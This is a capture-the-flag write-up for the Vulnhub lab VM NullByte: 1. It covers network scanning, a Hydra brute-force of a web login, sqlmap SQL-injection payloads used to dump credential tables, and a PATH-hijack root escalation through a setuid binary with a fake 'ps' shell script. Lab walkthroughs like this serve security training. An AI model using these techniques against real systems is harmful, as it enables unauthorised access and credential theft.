[Vulnhub]NullByte: 1

NullByte challenge 0x01

Difficulty is Basic to intermediate.

“Use your lateral thinking skills, maybe you’ll need to write some code.” – ly0n

More information and OVA file download please check here.

Attacker & Target

Attacker: Kali Linux (10.10.10.130/24)

Target: NullByte: 1 (10.10.10.134/24)

Vulnerability & Exploit

  • Found hidden information in picture and open the hidden path
  • Weak passwords used in Web login form, the password can be found by brute-force attacking
  • SQL injection vulnerability found in username searching page
  • Exploit SQL injection vulnerability to get user credentials, also can get a limited shell
  • Found user ramses with Base64 encoded MD5 password which can be cracked easily and SSH login as ramses
  • Mis-configuration program which has setuid set and did not use full path inside of system call. Exploit it to get ROOT

Method

  • Scanned the network to discover the target server [Net Discover]
  • Port scanned the target to discover the running services and open ports [unicornscan & nmap]
  • Web application vulnerability scanned to discover any web vulnerability [nikto]
  • Brute force scan to find hidden path [dirb]
  • Web information gathering and interacting with the web server [firefox]
  • Download picture from index.html and reveal the hidden information stored in it
  • Found the hidden folder and a login page which has comment saying that the password is simple
  • Use hydra with rockyou.txt to burte force crack the login password [THC Hydra]
  • The next username searching page is SQL injection vulnerable, exploit it to downlaod system sensitive file, login credentials and also get a limited shell [sqlmap]
  • Crack user ramses’s password and ssh login to get a better shell
  • System enumeration and Exploit vulnerable program with setuid bit set to get ROOT

Tools

All the tools used here can be found in Kali Linux

Walkthrough

Using netdiscover as routine to detect the target’s IP address (10.10.10.134 in this case).

1
2
3
4
5
6
7
8
9
10
11

F4l13n@kali:~$ sudo netdiscover -r 10.1.1.0/24
 Currently scanning: Finished!   |   Screen View: Unique Hosts                                                                                                  
                                                                                                                                                                
 5 Captured ARP Req/Rep packets, from 5 hosts.   Total size: 300                                                                                                
 _____________________________________________________________________________
   IP            At MAC Address      Count  Len   MAC Vendor                   
 ----------------------------------------------------------------------------- 
 10.1.1.1        00:50:56:c0:00:08    01    060   VMWare, Inc.                                                                                                  
 10.1.1.2        00:50:56:fd:d1:6b    01    060   VMWare, Inc.                                                                                                  
 10.1.1.134      00:0c:29:e1:e0:98    01    060   VMware, Inc.                                                                                              
 10.1.1.254      00:50:56:ee:31:18    01    060   VMWare, Inc.

10.10.10.134 is our Target!

Then run uniscornscan to detect opening ports on the target (unicornscan is much faster than nmap when doing a full ports scan, so here I use it to make a full scan and then use nmap to do a deep scan on target ports).

1
2
3
4
5
6

F4l13n@kali:~$ sudo us -H -msf -Iv -p 1-65535 10.1.1.134
listener statistics 147984 packets recieved 0 packets droped and 0 interface drops
TCP open              http[   80]     from 10.1.1.134  ttl 64 
TCP open            sunrpc[  111]     from 10.1.1.134  ttl 64 
TCP open    multiling-http[  777]     from 10.1.1.134  ttl 64 
TCP open           unknown[32942]     from 10.1.1.134  ttl 64

From the result above, TCP port 80, 111, 777 and 32942 have been discovered.

Then I run NMAP scan to probe more detail information for the four opening ports.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40

# Nmap 6.49BETA4 scan initiated Mon Aug 17 07:06:13 2015 as: nmap -v -sV -O -A -T4 -p 80,111,777,32942 -oN NullByte_nmap.txt 10.1.1.134
Nmap scan report for 10.1.1.134
Host is up (0.00044s latency).
PORT      STATE SERVICE VERSION
80/tcp    open  http    Apache httpd 2.4.10 ((Debian))
|_http-methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Null Byte 00 - level 1
111/tcp   open  rpcbind 2-4 (RPC #100000)
| rpcinfo: 
|   program version   port/proto  service
|   100000  2,3,4        111/tcp  rpcbind
|   100000  2,3,4        111/udp  rpcbind
|   100024  1          32942/tcp  status
|_  100024  1          47213/udp  status
777/tcp   open  ssh     OpenSSH 6.7p1 Debian 5 (protocol 2.0)
| ssh-hostkey: 
|   1024 16:30:13:d9:d5:55:36:e8:1b:b7:d9:ba:55:2f:d7:44 (DSA)
|   2048 29:aa:7d:2e:60:8b:a6:a1:c2:bd:7c:c8:bd:3c:f4:f2 (RSA)
|_  256 60:06:e3:64:8f:8a:6f:a7:74:5a:8b:3f:e1:24:93:96 (ECDSA)
32942/tcp open  status  1 (RPC #100024)
MAC Address: 00:0C:29:E1:E0:98 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X
OS CPE: cpe:/o:linux:linux_kernel:3
OS details: Linux 3.2 - 3.19
Uptime guess: 0.029 days (since Mon Aug 17 06:25:06 2015)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=264 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.44 ms 10.1.1.134

Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Aug 17 07:06:29 2015 -- 1 IP address (1 host up) scanned in 16.18 seconds

I found that the port 777 is running SSH and apache 2.4.10 is running on port 80, and the server is Debian Linux with 3.x kernel.

Then I use nikto to scan if any known vulnerabilty can be found which will be a life saver.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22

- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.1.1.134
+ Target Hostname:    10.1.1.134
+ Target Port:        80
+ Start Time:         2015-08-17 07:01:56 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.10 (Debian)
+ Server leaks inodes via ETags, header found with file /, fields: 0xc4 0x51c42a5c32a70 
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.10 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS 
+ Uncommon header 'x-ob_mode' found, with contents: 0
+ OSVDB-3233: /icons/README: Apache default file found.
+ /phpmyadmin/: phpMyAdmin directory found
+ 7668 requests: 0 error(s) and 9 item(s) reported on remote host
+ End Time:           2015-08-17 07:02:17 (GMT-4) (21 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

Nothing too exciting, but found phpmyadmin installed and a folder /phpmyadmin/.

Secret in the Pic

Then I tried default password and some weak passwords with login phpmyadmin, but all failed.

Then I open iceweasel browser to have a close look at the website. There is only a picture with a sentence If you search for the laws of harmony, you will find knowledge.

Nothing wrong about the sentence… but hint is hidden in the picture…

1
2
3
4
5
6
7
8
9
10
11
12
13
14

F4l13n@kali:~/vulnhub/NullByte$ strings main.gif 
GIF89a
P-): kzMb5nVYJw
cccIII@@@GGG444999```<<<
ooo>>>EEE
???^^^
HHH;;;
gggRRRJJJ+++
TTTZZZ
QQQ///
~~~'''CCC
   AAA
aaa222
... ...

Pay attention to the second line below the GIF89a:

P-): kzMb5nVYJw

Then I tried to use the string ‘kzMb5nVYJw’ as an hidden folder and found the hidden login page:

From the source code, I noticed that this form is not connected to mysql and password is not complex… so here would be an online brute force attacking based on password-dict.

I use Hydra with rockyou.txt dictionary to brute force the login form and got the password: elite. (The parameter -l admin does not make any sense, just get rid of errors)

1
2
3
4
5
6
7
8
9
10
11

F4l13n@kali:~/vulnhub/NullByte$ sudo hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.1.1.134 http-post-form "/kzMb5nVYJw/index.php:key=^PASS^:invalid"
[sudo] password for F4l13n: 
Hydra v8.1 (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2015-08-17 09:20:13
[WARNING] Restorefile (./hydra.restore) from a previous session found, to prevent overwriting, you have 10 seconds to abort...
[DATA] max 16 tasks per 1 server, overall 64 tasks, 14344399 login tries (l:1/p:14344399), ~14008 tries per task
[DATA] attacking service http-post-form on port 80
[80][http-post-form] host: 10.1.1.134   login: admin   password: elite
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2015-08-17 09:20:57

When I logged in with password elite, I have been forwarded to the following username searching page.

After tired several common SQLi test, I found SQL injection vulnerability exists in the parameter usrtosearch, the injection point is http://10.1.1.134/kzMb5nVYJw/420search.php?usrtosearch=admin

Then I use SQLMAP to finish all the rest works:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34

kali# sqlmap -u "http://10.1.1.134/kzMb5nVYJw/420search.php?usrtosearch=123*" --dbs
... ...
[09:45:30] [WARNING] in OR boolean-based injections, please consider usage of switch '--drop-set-cookie' if you experience any problems during data retrieval
URI parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] 
sqlmap identified the following injection point(s) with a total of 151 HTTP(s) requests:
---
Parameter: #1* (URI)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: http://10.1.1.134:80/kzMb5nVYJw/420search.php?usrtosearch=-8162" OR 3808=3808#

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT - comment)
    Payload: http://10.1.1.134:80/kzMb5nVYJw/420search.php?usrtosearch=123" AND (SELECT * FROM (SELECT(SLEEP(5)))hjFz)#

    Type: UNION query
    Title: MySQL UNION query (NULL) - 3 columns
    Payload: http://10.1.1.134:80/kzMb5nVYJw/420search.php?usrtosearch=123" UNION ALL SELECT NULL,NULL,CONCAT(0x7170706271,0x6845736a5777725a736a,0x71706b7a71)#
---
[09:45:32] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian
web application technology: Apache 2.4.10
back-end DBMS: MySQL 5.0.12
[09:45:32] [INFO] fetching database names
available databases [5]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] phpmyadmin
[*] seth

[09:45:33] [INFO] fetched data logged to text files under '/root/.sqlmap/output/10.1.1.134'

[*] shutting down at 09:45:33

Checking the databases to grab passwords:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21

kali# sqlmap -u "http://10.1.1.134/kzMb5nVYJw/420search.php?usrtosearch=123*" --batch --smart --dump -C User,Password,Host,Super_priv -T user -D mysql

... ...
Database: mysql
Table: user
[6 entries]
+------------------+-------------------------------------------------------+-----------+------------+
| User             | Password                                              | Host      | Super_priv |
+------------------+-------------------------------------------------------+-----------+------------+
| root             | *18DC78FB0C441444482C7D1132C7A23D705DAFA7 (sunnyvale) | localhost | Y          |
| root             | *18DC78FB0C441444482C7D1132C7A23D705DAFA7 (sunnyvale) | nullbyte  | Y          |
| root             | *18DC78FB0C441444482C7D1132C7A23D705DAFA7 (sunnyvale) | 127.0.0.1 | Y          |
| root             | *18DC78FB0C441444482C7D1132C7A23D705DAFA7 (sunnyvale) | ::1       | Y          |
| debian-sys-maint | *BD9EDF51931EC5408154EBBB88AA01DA22B8A8DC             | localhost | Y          |
| phpmyadmin       | *18DC78FB0C441444482C7D1132C7A23D705DAFA7 (sunnyvale) | localhost | N          |
+------------------+-------------------------------------------------------+-----------+------------+

[09:56:13] [WARNING] table 'mysql.`user`' dumped to CSV file '/root/.sqlmap/output/10.1.1.134/dump/mysql/user-f3649c95.csv'
[09:56:13] [INFO] fetched data logged to text files under '/root/.sqlmap/output/10.1.1.134'

[*] shutting down at 09:56:13

Found mysql database login (this also can be used to login phpmyadmin): root / sunnyvale

Be ramses!

There is another users table in database seth, which including the password hash of user ramses

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23

kali# sqlmap -u "http://10.1.1.134/kzMb5nVYJw/420search.php?usrtosearch=123*" --batch --smart --dump -T users -D seth
... ...
[10:12:15] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian
web application technology: Apache 2.4.10
back-end DBMS: MySQL 5.0.12
[10:12:15] [INFO] fetching columns 'position, user, id, pass' for table 'users' in database 'seth'
[10:12:15] [INFO] fetching entries of column(s) '`position`, `user`, id, pass' for table 'users' in database 'seth'
[10:12:15] [INFO] analyzing table dump for possible password hashes
Database: seth
Table: users
[2 entries]
+----+--------+------------+---------------------------------------------+
| id | user   | position   | pass                                        |
+----+--------+------------+---------------------------------------------+
| 1  | ramses | <blank>    | YzZkNmJkN2ViZjgwNmY0M2M3NmFjYzM2ODE3MDNiODE |
| 2  | isis   | employee   | --not allowed--                             |
+----+--------+------------+---------------------------------------------+

[10:12:15] [INFO] table 'seth.users' dumped to CSV file '/root/.sqlmap/output/10.1.1.134/dump/seth/users.csv'
[10:12:15] [INFO] fetched data logged to text files under '/root/.sqlmap/output/10.1.1.134'

[*] shutting down at 10:12:15

Found user login credentials: ramses / YzZkNmJkN2ViZjgwNmY0M2M3NmFjYzM2ODE3MDNiODE

Base64 decoded the encrypted password and got a MD5 hash: c6d6bd7ebf806f43c76acc3681703b81

1
2

F4l13n@kali:~$ echo YzZkNmJkN2ViZjgwNmY0M2M3NmFjYzM2ODE3MDNiODE | base64 -d
c6d6bd7ebf806f43c76acc3681703b81base64: invalid input

Then crack the MD5 hash to get password in plaintext, which is omega

Then downloading /etc/passwd for further enumeration.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:103:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:104:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:105:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:106:systemd Bus Proxy,,,:/run/systemd:/bin/false
messagebus:x:104:111::/var/run/dbus:/bin/false
avahi:x:105:112:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
Debian-exim:x:106:114::/var/spool/exim4:/bin/false
statd:x:107:65534::/var/lib/nfs:/bin/false
colord:x:108:117:colord colour management daemon,,,:/var/lib/colord:/bin/false
sshd:x:109:65534::/var/run/sshd:/usr/sbin/nologin
saned:x:110:119::/var/lib/saned:/bin/false
hplip:x:111:7:HPLIP system user,,,:/var/run/hplip:/bin/false
bob:x:1000:1000:bob,,,:/home/bob:/bin/bash
eric:x:1001:1001:,,,:/home/eric:/bin/bash
mysql:x:112:120:MySQL Server,,,:/nonexistent:/bin/false
ramses:x:1002:1002:,,,:/home/ramses:/bin/bash

user ramses found in /etc/passwd file.

From previous findings, I know SSH is open on port 777, so try to SSH login with cracked password ramses / omega and bingo!

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15

F4l13n@kali:~/vulnhub/NullByte/sqlmap_rst$ ssh ramses@10.1.1.134 -p 777
ramses@10.1.1.134's password: 

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Aug  2 01:38:58 2015 from 192.168.1.109
ramses@NullByte:~$ id
uid=1002(ramses) gid=1002(ramses) groups=1002(ramses)
ramses@NullByte:~$ pwd
/home/ramses
ramses@NullByte:~$

Now I am ramses!

Privilege Escalation

Looking around and found interesting program procwatch which has setuid set in the folder /var/www/backup

By running the program and analysing the outcome, I can recognize that it calls system command ps in the program. However the program does not use full path of ps, so here is mis-configuration vulnerability which could be exploited by an attacker to make fake ps and set $PATH to get ROOT privilege.

Then I wrote a shell script and saved as ‘ps’, and grant executable permition for it.

1
2
3
4
5
6

# cat ps
#!/bin/sh
id
/bin/sh

# chmod +x ps

Then change the environment variable $PATH

1
2
3
4
5

ramses@NullByte:/var/www/backup$ echo $PATH
/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games
ramses@NullByte:/var/www/backup$ export PATH=.:$PATH
ramses@NullByte:/var/www/backup$ echo $PATH
.:/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games

Then run the program procwatch to get ROOT:

1
2
3
4
5
6
7
8

ramses@NullByte:/var/www/backup$ ./procwatch 
uid=1002(ramses) gid=1002(ramses) euid=0(root) groups=1002(ramses)
# id
uid=1002(ramses) gid=1002(ramses) euid=0(root) groups=1002(ramses)
# cd /root
# ls -l
total 4
-rw-r--r-- 1 root root 1170 Aug  2 01:45 proof.txt

Catch the flag proof.txt.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29

# cat proof.txt  
adf11c7a9e6523e630aaf3b9b7acb51d

It seems that you have pwned the box, congrats. 
Now you done that I wanna talk with you. Write a walk & mail at
xly0n@sigaint.org attach the walk and proof.txt
If sigaint.org is down you may mail at nbsly0n@gmail.com


USE THIS PGP PUBLIC KEY

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: BCPG C# v1.6.1.0

mQENBFW9BX8BCACVNFJtV4KeFa/TgJZgNefJQ+fD1+LNEGnv5rw3uSV+jWigpxrJ
Q3tO375S1KRrYxhHjEh0HKwTBCIopIcRFFRy1Qg9uW7cxYnTlDTp9QERuQ7hQOFT
e4QU3gZPd/VibPhzbJC/pdbDpuxqU8iKxqQr0VmTX6wIGwN8GlrnKr1/xhSRTprq
Cu7OyNC8+HKu/NpJ7j8mxDTLrvoD+hD21usssThXgZJ5a31iMWj4i0WUEKFN22KK
+z9pmlOJ5Xfhc2xx+WHtST53Ewk8D+Hjn+mh4s9/pjppdpMFUhr1poXPsI2HTWNe
YcvzcQHwzXj6hvtcXlJj+yzM2iEuRdIJ1r41ABEBAAG0EW5ic2x5MG5AZ21haWwu
Y29tiQEcBBABAgAGBQJVvQV/AAoJENDZ4VE7RHERJVkH/RUeh6qn116Lf5mAScNS
HhWTUulxIllPmnOPxB9/yk0j6fvWE9dDtcS9eFgKCthUQts7OFPhc3ilbYA2Fz7q
m7iAe97aW8pz3AeD6f6MX53Un70B3Z8yJFQbdusbQa1+MI2CCJL44Q/J5654vIGn
XQk6Oc7xWEgxLH+IjNQgh6V+MTce8fOp2SEVPcMZZuz2+XI9nrCV1dfAcwJJyF58
kjxYRRryD57olIyb9GsQgZkvPjHCg5JMdzQqOBoJZFPw/nNCEwQexWrgW7bqL/N8
TM2C0X57+ok7eqj8gUEuX/6FxBtYPpqUIaRT9kdeJPYHsiLJlZcXM0HZrPVvt1HU
Gms=
=PiAQ
-----END PGP PUBLIC KEY BLOCK-----

Done and cheers Ly0n!

2015-08-18 23:12:46 +1000
nullbyte, sql injection, sticky bit, vulnhub